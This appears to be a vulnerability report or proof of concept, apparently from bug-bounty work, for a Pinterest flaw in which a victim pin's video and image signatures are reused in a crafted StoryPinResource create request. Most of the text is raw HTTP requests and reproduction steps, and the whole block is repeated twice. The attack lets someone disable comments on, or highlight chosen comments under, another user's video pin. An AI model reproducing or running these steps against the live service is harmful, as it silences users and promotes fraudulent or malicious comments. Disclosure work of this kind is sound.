Nov 18, 2024, 02:56 PM
--- using a web proxy (mitmproxy, burpsuite, fiddler, caido), send GET pinterest.com/pin/{victim_pin_id}
GET /pin/{victim_pin_id}/ HTTP/1.1
Host: pinterest.com
--- save "video_signature":"aaaabbbbccccddddeeee" & "image_signature_adjusted":"ppppttttyyyyuuuuzzzz" from HTTP response
--- create video pin and capture following HTTP request
POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com
source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\"hhhhjjjjkkkklllloooo\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"uuuukkkkjjjjttttvvvv\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}
--- send following request changing a body parameter of capture request
POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com
source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\" ppppttttyyyyuuuuzzzz\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"aaaabbbbccccddddeeeee\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}
--- visit your video pin that created with victims video_signature,image_signature_adjusted
--- disable comment of your video pin or create comment and highlight it
--- exploit is impacted on pinterest.com/pin/{victim_pin_id}/
This vulnerability allows an attacker to disable all comments on any video pin, effectively silencing other users, while simultaneously highlighting fraudulent or malicious comments.
GET /pin/{victim_pin_id}/ HTTP/1.1
Host: pinterest.com
--- save "video_signature":"aaaabbbbccccddddeeee" & "image_signature_adjusted":"ppppttttyyyyuuuuzzzz" from HTTP response
--- create video pin and capture following HTTP request
POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com
source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\"hhhhjjjjkkkklllloooo\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"uuuukkkkjjjjttttvvvv\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}
--- send following request changing a body parameter of capture request
POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com
source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\" ppppttttyyyyuuuuzzzz\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"aaaabbbbccccddddeeeee\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}
--- visit your video pin that created with victims video_signature,image_signature_adjusted
--- disable comment of your video pin or create comment and highlight it
--- exploit is impacted on pinterest.com/pin/{victim_pin_id}/
This vulnerability allows an attacker to disable all comments on any video pin, effectively silencing other users, while simultaneously highlighting fraudulent or malicious comments.